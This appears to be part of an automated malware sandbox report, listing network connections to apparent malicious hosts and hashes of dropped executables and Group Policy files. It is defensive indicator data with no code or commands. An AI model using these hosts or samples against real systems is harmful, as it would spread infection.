NL 157.240.201.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
US 8.8.8.8:53 crls.pki.goog udp
NL 142.251.36.35:80 crls.pki.goog tcp
NL 142.251.36.35:80 crls.pki.goog tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 mikolyda.beget.tech udp
RU 91.106.207.50:80 mikolyda.beget.tech tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 hoffmanlevi.space udp
RU 45.130.41.106:443 hoffmanlevi.space tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.153:80 apps.identrust.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 facebook.com udp
GB 157.240.221.35:443 facebook.com tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
GB 157.240.221.35:443 facebook.com tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 fbcdn.net udp
GB 157.240.221.35:443 fbcdn.net tcp
GB 157.240.221.35:443 fbcdn.net tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
RU 45.130.41.106:443 hoffmanlevi.space tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 fbsbx.com udp
GB 157.240.221.35:443 fbsbx.com tcp
GB 157.240.221.35:443 fbsbx.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
FI 77.91.68.52:80 77.91.68.52 tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp

Files

memory/1468-0-0x000000013FB70000-0x000000014020B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab3610.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar37E7.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe

MD5 5aa38295da76c7810a946e570d8fe083
SHA1 e308b69c06c2655f8aa1f550dfaef9388163963a
SHA256 78e6096326c837b23be4519087c4f920a0e5c0b3dca3a407e926a8d3940bde2f
SHA512 e4b610bb3c5e6ed7a93323e9e248f7de81dd4d7a61fe2896cc25e30924217f1d9519409c76118a47acb99ad46d1c2ed3893164dd3e883402b1ee725abcd6f8ab

C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe

MD5 f1fb98c3d7d9b773b9f4733cedca1cd7
SHA1 41cdbb3409d661bc1ae9a922a525e0012c551d5d
SHA256 525b46b9c510675b05a76d96af37c5f3ad182fce29df1115a3d480afceb871bc
SHA512 6f7255f5de9936c0413b0b1c9c21d6b9326a2473f29f9950815206b92d892db7ba305c1ad87abf9b579a75bc1d9b09c77f566d5996b51bfa60557ab36c488268

C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe

MD5 d852aed84489b36f5d6b0f6a075cafd6
SHA1 73a175bbf684f85881b6d27d3551d0d6e734d6df
SHA256 9d1e08892c14289ddbc966d9f1da12c36d9e21b2c8803532819e0e048c4c6274
SHA512 dea771a5502bee275531da3634775433eff6fefdce2c4ddceb8762b95efc6718edcc714eac705481109acd8c6ef9c139b3ad7e91e6723d38203b0d9995746ad4

C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe

MD5 b9a096baebdf8e44368e9724da8e56dd
SHA1 f9873fa92ae8b75e23e353f43ae1ba9087edebfc
SHA256 2157d146a890d32c5ba49f31fa1840e5b0d56e4dd0bbf5f8b14cc4e482a47bef
SHA512 f17ee70d827fba12de17062add350df0803009e5b930a0f0a7891e6bf64f0df8f443355ec72ae332aed3b37d24f40c78e0a559040e45994e02e3a5ad71624b08

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E1993F15A3402D743FF8169CEB684DD3

MD5 d056c7ed1f4352765c2a64d94735590d
SHA1 583d42c202d4a1f7993ba1cf637c5350978dfa91
SHA256 bcb2e1ce694f498fb6ec7cd4ca7c258faaf0be566fffbc78b8eaebdfb06a5486
SHA512 3475af7c4fe3ef6ac3c442354c9381cfa36734c563172c5a2f2aeefc5830dabcab02518e41cb4cd135425b9daa0206f012f49a7f75568eb040d2331fd02e4499

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E1993F15A3402D743FF8169CEB684DD3

MD5 2d459b176b30094a41471f48dfc007a1
SHA1 3c6614225ddcc5a331e8439c05af40d610a05d3b
SHA256 5ba424599a34daee94c313b9d5490249543e068b76d5634688504e2a8cb729fe
SHA512 c6655a4141638dc8fa0822af2502fab22d669f76ee59775c31bffc8be174a22a3ffb911651f7244191b417b14aa506069943b157b7398c43a2b6fd889e953f92

C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe

MD5 3d683bae0039e46ad50bebf4681785a0
SHA1 e8662a8cf438ec8521d71dc8b431c1ba592bd881
SHA256 e69e93cc1b989513d5bb4660d326f2e9aea09f903781ef9bdcbbbe2c24dbcc58
SHA512 f85f57d9299f4dafc3b5101af37d6f4c57ae8db23fa1a6aa1b2df37ae655d157b16b4177b9f6e45d0497a14b56451d37e123e6225ca4ed44070183d182ad563e

C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe

MD5 5aa38295da76c7810a946e570d8fe083
SHA1 e308b69c06c2655f8aa1f550dfaef9388163963a
SHA256 78e6096326c837b23be4519087c4f920a0e5c0b3dca3a407e926a8d3940bde2f
SHA512 e4b610bb3c5e6ed7a93323e9e248f7de81dd4d7a61fe2896cc25e30924217f1d9519409c76118a47acb99ad46d1c2ed3893164dd3e883402b1ee725abcd6f8ab

C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe

MD5 d852aed84489b36f5d6b0f6a075cafd6
SHA1 73a175bbf684f85881b6d27d3551d0d6e734d6df
SHA256 9d1e08892c14289ddbc966d9f1da12c36d9e21b2c8803532819e0e048c4c6274
SHA512 dea771a5502bee275531da3634775433eff6fefdce2c4ddceb8762b95efc6718edcc714eac705481109acd8c6ef9c139b3ad7e91e6723d38203b0d9995746ad4

C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe

MD5 b9a096baebdf8e44368e9724da8e56dd
SHA1 f9873fa92ae8b75e23e353f43ae1ba9087edebfc
SHA256 2157d146a890d32c5ba49f31fa1840e5b0d56e4dd0bbf5f8b14cc4e482a47bef
SHA512 f17ee70d827fba12de17062add350df0803009e5b930a0f0a7891e6bf64f0df8f443355ec72ae332aed3b37d24f40c78e0a559040e45994e02e3a5ad71624b08

C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe

MD5 f1fb98c3d7d9b773b9f4733cedca1cd7
SHA1 41cdbb3409d661bc1ae9a922a525e0012c551d5d
SHA256 525b46b9c510675b05a76d96af37c5f3ad182fce29df1115a3d480afceb871bc
SHA512 6f7255f5de9936c0413b0b1c9c21d6b9326a2473f29f9950815206b92d892db7ba305c1ad87abf9b579a75bc1d9b09c77f566d5996b51bfa60557ab36c488268

C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe

MD5 487d3214ced555a38e0b13dd37285ade
SHA1 656a5891bff67714d6583c2c2e484b0de721d09c
SHA256 f347898a48829ec52d4bb0e18458cd23ce04f5af5d81c80363fdc15c3b4c77f8
SHA512 3a3ca5578861186b1773f1cf50e6d9ae9dbac0aafa17ad227f65b2593c5a408e50f46aea56d03bc8b85f4500b4228540a1ee0c80644b8f0c4305f0352a0e4163

C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe

MD5 df71a06b859776129a744f9dbfddc401
SHA1 a8823e2b086fc4c9e5b148ad6cd29f095da05337
SHA256 d2fb526d868cb4488157564ae891059160b4349d550a291398b3d48ae28b2681
SHA512 76fe69a046f470ca013af39c92a40fff7d6b7a7ad236ea9466d87bbdeac3537d2f1a7544ee5eb1bf179506b780ba0c5fc05f45146befbab12bca1144f21362df

memory/1492-209-0x0000000000400000-0x0000000000AFF000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe

MD5 eede39c7c0198e86a3b75d2b8af77201
SHA1 b4545ddfbf9a70674a3f28aafe7abf7b4828b9f1
SHA256 7d61b2faaa4ca4c6a3ace89ab8a514c1d928492f4e41552b0386ccf7506d6727
SHA512 31698efaf32fca4bacbf7eef3c51b1db1350ea6768c498e859feea0dc610b3fdce8f5f1691279807088aa0a94eb61578bc6082840312dd17f8910ba7dd6f240d

\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe

MD5 f1fb98c3d7d9b773b9f4733cedca1cd7
SHA1 41cdbb3409d661bc1ae9a922a525e0012c551d5d
SHA256 525b46b9c510675b05a76d96af37c5f3ad182fce29df1115a3d480afceb871bc
SHA512 6f7255f5de9936c0413b0b1c9c21d6b9326a2473f29f9950815206b92d892db7ba305c1ad87abf9b579a75bc1d9b09c77f566d5996b51bfa60557ab36c488268

\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe

MD5 eede39c7c0198e86a3b75d2b8af77201
SHA1 b4545ddfbf9a70674a3f28aafe7abf7b4828b9f1
SHA256 7d61b2faaa4ca4c6a3ace89ab8a514c1d928492f4e41552b0386ccf7506d6727
SHA512 31698efaf32fca4bacbf7eef3c51b1db1350ea6768c498e859feea0dc610b3fdce8f5f1691279807088aa0a94eb61578bc6082840312dd17f8910ba7dd6f240d

C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe

MD5 f1fb98c3d7d9b773b9f4733cedca1cd7
SHA1 41cdbb3409d661bc1ae9a922a525e0012c551d5d
SHA256 525b46b9c510675b05a76d96af37c5f3ad182fce29df1115a3d480afceb871bc
SHA512 6f7255f5de9936c0413b0b1c9c21d6b9326a2473f29f9950815206b92d892db7ba305c1ad87abf9b579a75bc1d9b09c77f566d5996b51bfa60557ab36c488268

C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe

MD5 3d683bae0039e46ad50bebf4681785a0
SHA1 e8662a8cf438ec8521d71dc8b431c1ba592bd881
SHA256 e69e93cc1b989513d5bb4660d326f2e9aea09f903781ef9bdcbbbe2c24dbcc58
SHA512 f85f57d9299f4dafc3b5101af37d6f4c57ae8db23fa1a6aa1b2df37ae655d157b16b4177b9f6e45d0497a14b56451d37e123e6225ca4ed44070183d182ad563e

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe

MD5 487d3214ced555a38e0b13dd37285ade
SHA1 656a5891bff67714d6583c2c2e484b0de721d09c
SHA256 f347898a48829ec52d4bb0e18458cd23ce04f5af5d81c80363fdc15c3b4c77f8
SHA512 3a3ca5578861186b1773f1cf50e6d9ae9dbac0aafa17ad227f65b2593c5a408e50f46aea56d03bc8b85f4500b4228540a1ee0c80644b8f0c4305f0352a0e4163

C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe

MD5 3d683bae0039e46ad50bebf4681785a0
SHA1 e8662a8cf438ec8521d71dc8b431c1ba592bd881
SHA256 e69e93cc1b989513d5bb4660d326f2e9aea09f903781ef9bdcbbbe2c24dbcc58
SHA512 f85f57d9299f4dafc3b5101af37d6f4c57ae8db23fa1a6aa1b2df37ae655d157b16b4177b9f6e45d0497a14b56451d37e123e6225ca4ed44070183d182ad563e

C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe

MD5 df71a06b859776129a744f9dbfddc401
SHA1 a8823e2b086fc4c9e5b148ad6cd29f095da05337
SHA256 d2fb526d868cb4488157564ae891059160b4349d550a291398b3d48ae28b2681
SHA512 76fe69a046f470ca013af39c92a40fff7d6b7a7ad236ea9466d87bbdeac3537d2f1a7544ee5eb1bf179506b780ba0c5fc05f45146befbab12bca1144f21362df

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe

MD5 6e3bab6e7b0eb009239eb642eb9d1764
SHA1 41e3d97c275cbb297a55f3c157454dc830697fa1
SHA256 2426765453363274d0b6a02eecd38a159738c106104b07f1df252099822a395e
SHA512 0ebab8f1ebe80d2333a32f0f5bb97a80cb2085ce7eebc20d5aa0a35c2d2b24f4515f783565f9871d668740c7dc599b14c8fb1f7ac288a27fe503b4f91c2d3ec0

memory/1076-219-0x0000000000340000-0x00000000003D2000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 7cc972a3480ca0a4792dc3379a763572
SHA1 f72eb4124d24f06678052706c542340422307317
SHA256 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512 ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 7cc972a3480ca0a4792dc3379a763572
SHA1 f72eb4124d24f06678052706c542340422307317
SHA256 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512 ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7

memory/2020-220-0x0000000000070000-0x00000000006A3000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe

MD5 1c05ce269187a688ceb10901bc39fce3
SHA1 ea0d9e0c5392d6b07770e7e9677660aac4f5387e
SHA256 c0de80877d3bd743ea80f7c8a2f7370a4fd18713e7661049549867ab909f0c98
SHA512 1bc710876b4910f2b54ab56c1288dbb94a2dd1d47c64b27d7ae822438f9db4ee4ef0f63e5b1ddeb9e8008b9ac5f5ae7faa5a300694958dc614dbc7814fbb7cd6

C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe

MD5 1c05ce269187a688ceb10901bc39fce3
SHA1 ea0d9e0c5392d6b07770e7e9677660aac4f5387e
SHA256 c0de80877d3bd743ea80f7c8a2f7370a4fd18713e7661049549867ab909f0c98
SHA512 1bc710876b4910f2b54ab56c1288dbb94a2dd1d47c64b27d7ae822438f9db4ee4ef0f63e5b1ddeb9e8008b9ac5f5ae7faa5a300694958dc614dbc7814fbb7cd6

memory/2516-228-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe

MD5 6e3bab6e7b0eb009239eb642eb9d1764
SHA1 41e3d97c275cbb297a55f3c157454dc830697fa1
SHA256 2426765453363274d0b6a02eecd38a159738c106104b07f1df252099822a395e
SHA512 0ebab8f1ebe80d2333a32f0f5bb97a80cb2085ce7eebc20d5aa0a35c2d2b24f4515f783565f9871d668740c7dc599b14c8fb1f7ac288a27fe503b4f91c2d3ec0

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

memory/2516-230-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe

MD5 6e3bab6e7b0eb009239eb642eb9d1764
SHA1 41e3d97c275cbb297a55f3c157454dc830697fa1
SHA256 2426765453363274d0b6a02eecd38a159738c106104b07f1df252099822a395e
SHA512 0ebab8f1ebe80d2333a32f0f5bb97a80cb2085ce7eebc20d5aa0a35c2d2b24f4515f783565f9871d668740c7dc599b14c8fb1f7ac288a27fe503b4f91c2d3ec0

memory/1076-239-0x0000000002E70000-0x0000000002F8B000-memory.dmp

memory/1076-238-0x0000000000340000-0x00000000003D2000-memory.dmp

memory/2796-240-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2796-242-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2796-244-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2796-245-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2796-247-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2796-249-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2796-250-0x0000000000160000-0x0000000000161000-memory.dmp

memory/2796-252-0x0000000000160000-0x0000000000161000-memory.dmp

memory/2796-254-0x0000000000160000-0x0000000000161000-memory.dmp

memory/2796-257-0x0000000000170000-0x0000000000171000-memory.dmp

memory/2796-259-0x0000000000170000-0x0000000000171000-memory.dmp

memory/2796-262-0x0000000000180000-0x0000000000181000-memory.dmp

memory/2796-264-0x0000000000180000-0x0000000000181000-memory.dmp

memory/2796-267-0x0000000000190000-0x0000000000191000-memory.dmp

memory/2796-269-0x0000000000190000-0x0000000000191000-memory.dmp

memory/2796-272-0x00000000001A0000-0x00000000001A1000-memory.dmp

memory/2796-274-0x00000000001A0000-0x00000000001A1000-memory.dmp

memory/2796-275-0x0000000000940000-0x0000000001484000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe

MD5 1c05ce269187a688ceb10901bc39fce3
SHA1 ea0d9e0c5392d6b07770e7e9677660aac4f5387e
SHA256 c0de80877d3bd743ea80f7c8a2f7370a4fd18713e7661049549867ab909f0c98
SHA512 1bc710876b4910f2b54ab56c1288dbb94a2dd1d47c64b27d7ae822438f9db4ee4ef0f63e5b1ddeb9e8008b9ac5f5ae7faa5a300694958dc614dbc7814fbb7cd6

\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe

MD5 07f202b6ba1e536526aa426fd3a1365e
SHA1 899dd1bb70e2b1a880218b5f28a7952ec17de111
SHA256 7822b122eb30de403e2850849e94eea638b6eb69105d99fde3a73f31dddacb92
SHA512 a02eace0fb46192978167bfd4feccfa4eb183ce4da2c7ccc8af3d3bce18c669c354e20f935001380b4aef43007a082d77543ee9d2650e82193a886e3b113efd7

memory/1492-279-0x0000000000400000-0x0000000000AFF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe

MD5 07f202b6ba1e536526aa426fd3a1365e
SHA1 899dd1bb70e2b1a880218b5f28a7952ec17de111
SHA256 7822b122eb30de403e2850849e94eea638b6eb69105d99fde3a73f31dddacb92
SHA512 a02eace0fb46192978167bfd4feccfa4eb183ce4da2c7ccc8af3d3bce18c669c354e20f935001380b4aef43007a082d77543ee9d2650e82193a886e3b113efd7

C:\Windows\System32\GroupPolicy\GPT.INI

MD5 93b3886bce89b59632cb37c0590af8a6
SHA1 04d3201fe6f36dc29947c0ca13cd3d8d2d6f5137
SHA256 851dd2bb0f555afaef368f1f761154da17360aeea4c01b72e43bf83264762c9f
SHA512 fc7baef346b827c3a1338819baa01af63d2d4c31f3f7e17b6f6b72adab70de81872a67e8f3c1a28453abb595dbac01819a9bcff0710e9651a45deaf2f89e65fb

\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe

MD5 07f202b6ba1e536526aa426fd3a1365e
SHA1 899dd1bb70e2b1a880218b5f28a7952ec17de111
SHA256 7822b122eb30de403e2850849e94eea638b6eb69105d99fde3a73f31dddacb92
SHA512 a02eace0fb46192978167bfd4feccfa4eb183ce4da2c7ccc8af3d3bce18c669c354e20f935001380b4aef43007a082d77543ee9d2650e82193a886e3b113efd7

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe

MD5 07f202b6ba1e536526aa426fd3a1365e
SHA1 899dd1bb70e2b1a880218b5f28a7952ec17de111
SHA256 7822b122eb30de403e2850849e94eea638b6eb69105d99fde3a73f31dddacb92
SHA512 a02eace0fb46192978167bfd4feccfa4eb183ce4da2c7ccc8af3d3bce18c669c354e20f935001380b4aef43007a082d77543ee9d2650e82193a886e3b113efd7

memory/1492-300-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1492-304-0x0000000000250000-0x0000000000251000-memory.dmp

memory/2376-305-0x0000000000080000-0x0000000000081000-memory.dmp

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe

MD5 df71a06b859776129a744f9dbfddc401
SHA1 a8823e2b086fc4c9e5b148ad6cd29f095da05337
SHA256 d2fb526d868cb4488157564ae891059160b4349d550a291398b3d48ae28b2681
SHA512 76fe69a046f470ca013af39c92a40fff7d6b7a7ad236ea9466d87bbdeac3537d2f1a7544ee5eb1bf179506b780ba0c5fc05f45146befbab12bca1144f21362df

\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe

MD5 d1125b2a4c3d1c467df3053159ab3b32
SHA1 6fd90488f80023efddece0951abbf8b42e71e26f
SHA256 5c639ebe40a11d76c593f3f3237875cde352ac02471035d9e436672c95ba83ec
SHA512 578d0bb04f31bd55ea31a0dbd0ae8114987e4a0106b6fd0aff1bdbc4c75783e59961c8181cc279f3fb8baaa5ae2121388ef75bf1bf2b531f9eca93be4c50580e

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe

MD5 d1125b2a4c3d1c467df3053159ab3b32
SHA1 6fd90488f80023efddece0951abbf8b42e71e26f
SHA256 5c639ebe40a11d76c593f3f3237875cde352ac02471035d9e436672c95ba83ec
SHA512 578d0bb04f31bd55ea31a0dbd0ae8114987e4a0106b6fd0aff1bdbc4c75783e59961c8181cc279f3fb8baaa5ae2121388ef75bf1bf2b531f9eca93be4c50580e

C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe

MD5 b9a096baebdf8e44368e9724da8e56dd
SHA1 f9873fa92ae8b75e23e353f43ae1ba9087edebfc
SHA256 2157d146a890d32c5ba49f31fa1840e5b0d56e4dd0bbf5f8b14cc4e482a47bef
SHA512 f17ee70d827fba12de17062add350df0803009e5b930a0f0a7891e6bf64f0df8f443355ec72ae332aed3b37d24f40c78e0a559040e45994e02e3a5ad71624b08

\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe

MD5 d1125b2a4c3d1c467df3053159ab3b32
SHA1 6fd90488f80023efddece0951abbf8b42e71e26f
SHA256 5c639ebe40a11d76c593f3f3237875cde352ac02471035d9e436672c95ba83ec
SHA512 578d0bb04f31bd55ea31a0dbd0ae8114987e4a0106b6fd0aff1bdbc4c75783e59961c8181cc279f3fb8baaa5ae2121388ef75bf1bf2b531f9eca93be4c50580e

C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe

MD5 5aa38295da76c7810a946e570d8fe083
SHA1 e308b69c06c2655f8aa1f550dfaef9388163963a
SHA256 78e6096326c837b23be4519087c4f920a0e5c0b3dca3a407e926a8d3940bde2f
SHA512 e4b610bb3c5e6ed7a93323e9e248f7de81dd4d7a61fe2896cc25e30924217f1d9519409c76118a47acb99ad46d1c2ed3893164dd3e883402b1ee725abcd6f8ab

C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe

MD5 d852aed84489b36f5d6b0f6a075cafd6
SHA1 73a175bbf684f85881b6d27d3551d0d6e734d6df
SHA256 9d1e08892c14289ddbc966d9f1da12c36d9e21b2c8803532819e0e048c4c6274
SHA512 dea771a5502bee275531da3634775433eff6fefdce2c4ddceb8762b95efc6718edcc714eac705481109acd8c6ef9c139b3ad7e91e6723d38203b0d9995746ad4

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe

MD5 d1125b2a4c3d1c467df3053159ab3b32
SHA1 6fd90488f80023efddece0951abbf8b42e71e26f
SHA256 5c639ebe40a11d76c593f3f3237875cde352ac02471035d9e436672c95ba83ec
SHA512 578d0bb04f31bd55ea31a0dbd0ae8114987e4a0106b6fd0aff1bdbc4c75783e59961c8181cc279f3fb8baaa5ae2121388ef75bf1bf2b531f9eca93be4c50580e

C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe

MD5 487d3214ced555a38e0b13dd37285ade
SHA1 656a5891bff67714d6583c2c2e484b0de721d09c
SHA256 f347898a48829ec52d4bb0e18458cd23ce04f5af5d81c80363fdc15c3b4c77f8
SHA512 3a3ca5578861186b1773f1cf50e6d9ae9dbac0aafa17ad227f65b2593c5a408e50f46aea56d03bc8b85f4500b4228540a1ee0c80644b8f0c4305f0352a0e4163

memory/296-387-0x0000000073180000-0x000000007386E000-memory.dmp

